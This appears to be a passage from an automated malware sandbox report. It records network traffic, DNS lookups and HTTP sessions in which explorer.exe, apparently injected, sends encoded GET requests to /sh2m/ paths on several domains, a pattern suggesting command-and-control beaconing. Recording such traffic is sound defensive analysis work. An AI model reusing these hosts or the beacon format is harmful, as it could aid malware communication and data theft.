                                                                                                      Jun 11, 2021 09:02:46.431207895 CEST4973680192.168.2.3104.18.193.20
                                                                                                      Jun 11, 2021 09:02:46.431240082 CEST4973680192.168.2.3104.18.193.20
                                                                                                      Jun 11, 2021 09:02:46.473290920 CEST8049736104.18.193.20192.168.2.3
                                                                                                      Jun 11, 2021 09:02:51.532536030 CEST4973780192.168.2.3173.234.255.253
                                                                                                      Jun 11, 2021 09:02:51.728164911 CEST8049737173.234.255.253192.168.2.3
                                                                                                      Jun 11, 2021 09:02:51.728344917 CEST4973780192.168.2.3173.234.255.253
                                                                                                      Jun 11, 2021 09:02:51.728471041 CEST4973780192.168.2.3173.234.255.253
                                                                                                      Jun 11, 2021 09:02:51.927200079 CEST8049737173.234.255.253192.168.2.3
                                                                                                      Jun 11, 2021 09:02:51.927234888 CEST8049737173.234.255.253192.168.2.3
                                                                                                      Jun 11, 2021 09:02:51.927257061 CEST8049737173.234.255.253192.168.2.3
                                                                                                      Jun 11, 2021 09:02:51.927275896 CEST8049737173.234.255.253192.168.2.3
                                                                                                      Jun 11, 2021 09:02:51.927292109 CEST8049737173.234.255.253192.168.2.3
                                                                                                      Jun 11, 2021 09:02:51.927546978 CEST4973780192.168.2.3173.234.255.253
                                                                                                      Jun 11, 2021 09:02:51.927597046 CEST4973780192.168.2.3173.234.255.253
                                                                                                      Jun 11, 2021 09:02:51.927602053 CEST4973780192.168.2.3173.234.255.253
                                                                                                      Jun 11, 2021 09:02:51.927604914 CEST4973780192.168.2.3173.234.255.253
                                                                                                      Jun 11, 2021 09:02:57.018436909 CEST4973880192.168.2.3104.21.89.72
                                                                                                      Jun 11, 2021 09:02:57.061005116 CEST8049738104.21.89.72192.168.2.3
                                                                                                      Jun 11, 2021 09:02:57.061249018 CEST4973880192.168.2.3104.21.89.72
                                                                                                      Jun 11, 2021 09:02:57.061425924 CEST4973880192.168.2.3104.21.89.72
                                                                                                      Jun 11, 2021 09:02:57.103861094 CEST8049738104.21.89.72192.168.2.3
                                                                                                      Jun 11, 2021 09:02:57.445303917 CEST8049738104.21.89.72192.168.2.3
                                                                                                      Jun 11, 2021 09:02:57.445329905 CEST8049738104.21.89.72192.168.2.3
                                                                                                      Jun 11, 2021 09:02:57.445338964 CEST8049738104.21.89.72192.168.2.3
                                                                                                      Jun 11, 2021 09:02:57.445660114 CEST4973880192.168.2.3104.21.89.72
                                                                                                      Jun 11, 2021 09:02:57.445765972 CEST4973880192.168.2.3104.21.89.72
                                                                                                      Jun 11, 2021 09:02:57.446099997 CEST8049738104.21.89.72192.168.2.3
                                                                                                      Jun 11, 2021 09:02:57.446647882 CEST4973880192.168.2.3104.21.89.72
                                                                                                      Jun 11, 2021 09:03:07.750242949 CEST4973980192.168.2.33.143.65.214
                                                                                                      Jun 11, 2021 09:03:07.889324903 CEST80497393.143.65.214192.168.2.3
                                                                                                      Jun 11, 2021 09:03:07.889559984 CEST4973980192.168.2.33.143.65.214
                                                                                                      Jun 11, 2021 09:03:07.889676094 CEST4973980192.168.2.33.143.65.214
                                                                                                      Jun 11, 2021 09:03:08.029758930 CEST80497393.143.65.214192.168.2.3
                                                                                                      Jun 11, 2021 09:03:08.030723095 CEST80497393.143.65.214192.168.2.3
                                                                                                      Jun 11, 2021 09:03:08.030756950 CEST80497393.143.65.214192.168.2.3
                                                                                                      Jun 11, 2021 09:03:08.030939102 CEST4973980192.168.2.33.143.65.214
                                                                                                      Jun 11, 2021 09:03:08.030992031 CEST4973980192.168.2.33.143.65.214
                                                                                                      Jun 11, 2021 09:03:08.170012951 CEST80497393.143.65.214192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.403656006 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:13.687568903 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.687798023 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:13.687930107 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:13.971976995 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974311113 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974340916 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974369049 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974395990 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974432945 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974466085 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974493027 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974515915 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974529028 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:13.974536896 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974558115 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974617958 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:13.974641085 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:14.184293985 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:14.258330107 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:14.258363008 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:14.258522034 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:14.260162115 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:14.468169928 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:14.468321085 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:19.269589901 CEST4974480192.168.2.3107.180.57.111
                                                                                                      Jun 11, 2021 09:03:19.407282114 CEST8049744107.180.57.111192.168.2.3
                                                                                                      Jun 11, 2021 09:03:19.407416105 CEST4974480192.168.2.3107.180.57.111
                                                                                                      Jun 11, 2021 09:03:19.407633066 CEST4974480192.168.2.3107.180.57.111
                                                                                                      Jun 11, 2021 09:03:19.545063972 CEST8049744107.180.57.111192.168.2.3
                                                                                                      Jun 11, 2021 09:03:19.565264940 CEST8049744107.180.57.111192.168.2.3
                                                                                                      Jun 11, 2021 09:03:19.565289974 CEST8049744107.180.57.111192.168.2.3
                                                                                                      Jun 11, 2021 09:03:19.565665007 CEST4974480192.168.2.3107.180.57.111
                                                                                                      Jun 11, 2021 09:03:19.565691948 CEST4974480192.168.2.3107.180.57.111
                                                                                                      Jun 11, 2021 09:03:19.703018904 CEST8049744107.180.57.111192.168.2.3
                                                                                                      Jun 11, 2021 09:03:24.680736065 CEST4975080192.168.2.345.195.169.197
                                                                                                      Jun 11, 2021 09:03:24.978627920 CEST804975045.195.169.197192.168.2.3
                                                                                                      Jun 11, 2021 09:03:24.978780985 CEST4975080192.168.2.345.195.169.197
                                                                                                      Jun 11, 2021 09:03:24.978941917 CEST4975080192.168.2.345.195.169.197
                                                                                                      Jun 11, 2021 09:03:25.279150009 CEST804975045.195.169.197192.168.2.3
                                                                                                      Jun 11, 2021 09:03:25.300106049 CEST804975045.195.169.197192.168.2.3
                                                                                                      Jun 11, 2021 09:03:25.303200006 CEST4975080192.168.2.345.195.169.197
                                                                                                      Jun 11, 2021 09:03:25.303299904 CEST4975080192.168.2.345.195.169.197
                                                                                                      Jun 11, 2021 09:03:25.601140022 CEST804975045.195.169.197192.168.2.3

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Jun 11, 2021 09:01:24.338618040 CEST5754453192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:24.388590097 CEST53575448.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:25.109719992 CEST5598453192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:25.159903049 CEST53559848.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:25.868381023 CEST6418553192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:25.928971052 CEST53641858.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:26.775058985 CEST6511053192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:26.836594105 CEST53651108.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:27.662250042 CEST5836153192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:27.712810040 CEST53583618.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:29.945643902 CEST6349253192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:29.998943090 CEST53634928.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:30.741817951 CEST6083153192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:30.794975996 CEST53608318.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:31.693821907 CEST6010053192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:31.746817112 CEST53601008.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:32.646459103 CEST5319553192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:32.697186947 CEST53531958.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:33.586540937 CEST5014153192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:33.637125015 CEST53501418.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:34.512847900 CEST5302353192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:34.563277960 CEST53530238.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:36.274436951 CEST4956353192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:36.324868917 CEST53495638.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:37.277277946 CEST5135253192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:37.328092098 CEST53513528.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:38.387057066 CEST5934953192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:38.437036991 CEST53593498.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:39.302576065 CEST5708453192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:39.353017092 CEST53570848.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:41.782471895 CEST5882353192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:41.832535028 CEST53588238.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:42.950047016 CEST5756853192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:42.999986887 CEST53575688.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:55.359546900 CEST5054053192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:55.421055079 CEST53505408.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:57.091483116 CEST5436653192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:57.154541016 CEST53543668.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:02:19.304805040 CEST5303453192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:02:19.366297960 CEST53530348.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:02:21.579060078 CEST5776253192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:02:21.639075041 CEST53577628.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:02:33.908291101 CEST5543553192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:02:33.982995987 CEST53554358.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:02:35.988408089 CEST5071353192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:02:36.054531097 CEST53507138.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:02:39.732753038 CEST5613253192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:02:39.795432091 CEST53561328.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:02:46.233736038 CEST5898753192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:02:46.329618931 CEST53589878.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:02:51.466469049 CEST5657953192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:02:51.529956102 CEST53565798.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:02:56.938940048 CEST6063353192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:02:57.016514063 CEST53606338.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:07.589299917 CEST6129253192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:07.749241114 CEST53612928.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:09.582503080 CEST6361953192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:09.659336090 CEST53636198.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.048239946 CEST6493853192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:13.402180910 CEST53649388.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:18.792134047 CEST6194653192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:18.860271931 CEST53619468.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:19.203794003 CEST6491053192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:19.267663002 CEST53649108.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:20.455569029 CEST5212353192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:20.517663002 CEST53521238.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:24.607898951 CEST5613053192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:24.679627895 CEST53561308.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:30.319385052 CEST5633853192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:31.326244116 CEST5633853192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:32.326234102 CEST5633853192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:32.392487049 CEST53563388.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:33.390429974 CEST53563388.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:34.391613007 CEST53563388.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:37.406413078 CEST5942053192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:37.484054089 CEST53594208.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:42.657643080 CEST5878453192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:42.844861031 CEST53587848.8.8.8192.168.2.3

                                                                                                      ICMP Packets

                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                      Jun 11, 2021 09:03:33.391097069 CEST192.168.2.38.8.8.8cff1(Port unreachable)Destination Unreachable
                                                                                                      Jun 11, 2021 09:03:34.391709089 CEST192.168.2.38.8.8.8cff1(Port unreachable)Destination Unreachable

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                      Jun 11, 2021 09:02:35.988408089 CEST192.168.2.38.8.8.80x79f9Standard query (0)www.take-me-bergen.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:46.233736038 CEST192.168.2.38.8.8.80x62a3Standard query (0)www.starflexacademy.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:51.466469049 CEST192.168.2.38.8.8.80x1ff4Standard query (0)www.ladorreguita.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:56.938940048 CEST192.168.2.38.8.8.80x42e2Standard query (0)www.candydulce.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:07.589299917 CEST192.168.2.38.8.8.80xa4ccStandard query (0)www.insurancedowntown.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:13.048239946 CEST192.168.2.38.8.8.80xc68eStandard query (0)www.ezonkorea.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:19.203794003 CEST192.168.2.38.8.8.80x87aaStandard query (0)www.dndemystified.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:24.607898951 CEST192.168.2.38.8.8.80x49daStandard query (0)www.meganfantastic.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:30.319385052 CEST192.168.2.38.8.8.80x5849Standard query (0)www.obi4ex.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:31.326244116 CEST192.168.2.38.8.8.80x5849Standard query (0)www.obi4ex.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:32.326234102 CEST192.168.2.38.8.8.80x5849Standard query (0)www.obi4ex.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:37.406413078 CEST192.168.2.38.8.8.80xbd04Standard query (0)www.sciencebasedmasks.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:42.657643080 CEST192.168.2.38.8.8.80x9fb3Standard query (0)www.baliholisticacademy.comA (IP address)IN (0x0001)

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                      Jun 11, 2021 09:02:36.054531097 CEST8.8.8.8192.168.2.30x79f9No error (0)www.take-me-bergen.com172.67.206.33A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:36.054531097 CEST8.8.8.8192.168.2.30x79f9No error (0)www.take-me-bergen.com104.21.37.82A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:46.329618931 CEST8.8.8.8192.168.2.30x62a3No error (0)www.starflexacademy.comwww-starflexacademy-com.rentcafecn.comCNAME (Canonical name)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:46.329618931 CEST8.8.8.8192.168.2.30x62a3No error (0)www-starflexacademy-com.rentcafecn.comwww.rentcafecloudflaremvccn.comCNAME (Canonical name)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:46.329618931 CEST8.8.8.8192.168.2.30x62a3No error (0)www.rentcafecloudflaremvccn.com104.18.193.20A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:46.329618931 CEST8.8.8.8192.168.2.30x62a3No error (0)www.rentcafecloudflaremvccn.com104.18.194.20A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:51.529956102 CEST8.8.8.8192.168.2.30x1ff4No error (0)www.ladorreguita.com173.234.255.253A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:57.016514063 CEST8.8.8.8192.168.2.30x42e2No error (0)www.candydulce.com104.21.89.72A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:57.016514063 CEST8.8.8.8192.168.2.30x42e2No error (0)www.candydulce.com172.67.156.242A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:07.749241114 CEST8.8.8.8192.168.2.30xa4ccNo error (0)www.insurancedowntown.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:07.749241114 CEST8.8.8.8192.168.2.30xa4ccNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.143.65.214A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:07.749241114 CEST8.8.8.8192.168.2.30xa4ccNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com13.59.53.244A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:07.749241114 CEST8.8.8.8192.168.2.30xa4ccNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com52.14.32.15A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:13.402180910 CEST8.8.8.8192.168.2.30xc68eNo error (0)www.ezonkorea.com3.34.12.41A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:19.267663002 CEST8.8.8.8192.168.2.30x87aaNo error (0)www.dndemystified.comdndemystified.comCNAME (Canonical name)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:19.267663002 CEST8.8.8.8192.168.2.30x87aaNo error (0)dndemystified.com107.180.57.111A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:24.679627895 CEST8.8.8.8192.168.2.30x49daNo error (0)www.meganfantastic.com45.195.169.197A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:32.392487049 CEST8.8.8.8192.168.2.30x5849Server failure (2)www.obi4ex.comnonenoneA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:33.390429974 CEST8.8.8.8192.168.2.30x5849Server failure (2)www.obi4ex.comnonenoneA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:34.391613007 CEST8.8.8.8192.168.2.30x5849Server failure (2)www.obi4ex.comnonenoneA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:37.484054089 CEST8.8.8.8192.168.2.30xbd04No error (0)www.sciencebasedmasks.comwww.sciencebasedmasks.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:42.844861031 CEST8.8.8.8192.168.2.30x9fb3No error (0)www.baliholisticacademy.com192.185.0.218A (IP address)IN (0x0001)

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • www.take-me-bergen.com
                                                                                                      • www.starflexacademy.com
                                                                                                      • www.ladorreguita.com
                                                                                                      • www.candydulce.com
                                                                                                      • www.insurancedowntown.com
                                                                                                      • www.ezonkorea.com
                                                                                                      • www.dndemystified.com
                                                                                                      • www.meganfantastic.com

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      0192.168.2.349730172.67.206.3380C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Jun 11, 2021 09:02:36.107449055 CEST564OUTGET /sh2m/?i0=Y4nA7D8ZanudJV/n7ckHSBWOhW22WEJR/asQiGNTmjaNDyrYZ8Q/zKqiBMBjk5weHegN&4huxZr=02MtK8MPsR3L HTTP/1.1
                                                                                                      Host: www.take-me-bergen.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      Jun 11, 2021 09:02:36.198753119 CEST565INHTTP/1.1 301 Moved Permanently
                                                                                                      Date: Fri, 11 Jun 2021 07:02:36 GMT
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=3600
                                                                                                      Expires: Fri, 11 Jun 2021 08:02:36 GMT
                                                                                                      Location: https://www.take-me-bergen.com/sh2m/?i0=Y4nA7D8ZanudJV/n7ckHSBWOhW22WEJR/asQiGNTmjaNDyrYZ8Q/zKqiBMBjk5weHegN&4huxZr=02MtK8MPsR3L
                                                                                                      cf-request-id: 0a9b7a4b6f00004e86649e6000000001
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=uZ7PdS8U42szUs6C995EPraRtYy8Z3heGDXHo52srsFgAOnHMVc1HK%2B33rG%2BJTIScJ5dUmsF%2FDV7BlHuDeG3FVgn0V3QRqxPm9ZPQBu8%2FJfPGZBjbl7E0sLXjgXuvNuIQbPRYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 65d8f98bef064e86-FRA
                                                                                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      1192.168.2.349736104.18.193.2080C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Jun 11, 2021 09:02:46.375958920 CEST4569OUTGET /sh2m/?i0=CQ6AMTNmXrT6GsHyvLqygrxreupfdtmN+4T1XtvAXMgditzRj6Y1Xuw537ryrSqhWitY&4huxZr=02MtK8MPsR3L HTTP/1.1
                                                                                                      Host: www.starflexacademy.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      Jun 11, 2021 09:02:46.430977106 CEST4570INHTTP/1.1 301 Moved Permanently
                                                                                                      Date: Fri, 11 Jun 2021 07:02:46 GMT
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=3600
                                                                                                      Expires: Fri, 11 Jun 2021 08:02:46 GMT
                                                                                                      Location: https://www.starflexacademy.com/sh2m/?i0=CQ6AMTNmXrT6GsHyvLqygrxreupfdtmN+4T1XtvAXMgditzRj6Y1Xuw537ryrSqhWitY&4huxZr=02MtK8MPsR3L
                                                                                                      cf-request-id: 0a9b7a7388000006292d0a2000000001
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 65d8f9cc0aa40629-FRA
                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      2192.168.2.349737173.234.255.25380C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Jun 11, 2021 09:02:51.728471041 CEST4571OUTGET /sh2m/?i0=AN9Dli3eSwBxhLN7Z92H8FzDOGpUzm7G3BkkvfgYwC6zoN6kwH9F+lw53Jt7Bui6OWXD&4huxZr=02MtK8MPsR3L HTTP/1.1
                                                                                                      Host: www.ladorreguita.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      Jun 11, 2021 09:02:51.927200079 CEST4571INHTTP/1.1 200 OK
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                      X-Powered-By: Nginx
                                                                                                      Date: Fri, 11 Jun 2021 07:02:57 GMT
                                                                                                      Connection: close
                                                                                                      Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                                                      Data Ascii: 3


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      3192.168.2.349738104.21.89.7280C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Jun 11, 2021 09:02:57.061425924 CEST4576OUTGET /sh2m/?i0=Qqwfsv61LD8gOSv2HQNs13/ILT3hkPAGuV1QQZOHa/kG/rdN/rA5QVkGcwq5olxFBDS9&4huxZr=02MtK8MPsR3L HTTP/1.1
                                                                                                      Host: www.candydulce.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      Jun 11, 2021 09:02:57.445303917 CEST4578INHTTP/1.1 508 Loop Detected
                                                                                                      Date: Fri, 11 Jun 2021 07:02:57 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Retry-After: 14400
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      cf-request-id: 0a9b7a9d4700004a56888ee000000001
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=X84uMHwcaOhnSaqO3QxevRGwyYRAADiM%2Fy3AJfFNjvSLLMCTJF%2BkAoJc66bHNiit0ArF6PoXjGYjdMYPlVrQyVbiaPMUJBrHCgmu2owzAO9P3l1UkID7qT6vkObWdgmH"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 65d8fa0ed8994a56-FRA
                                                                                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
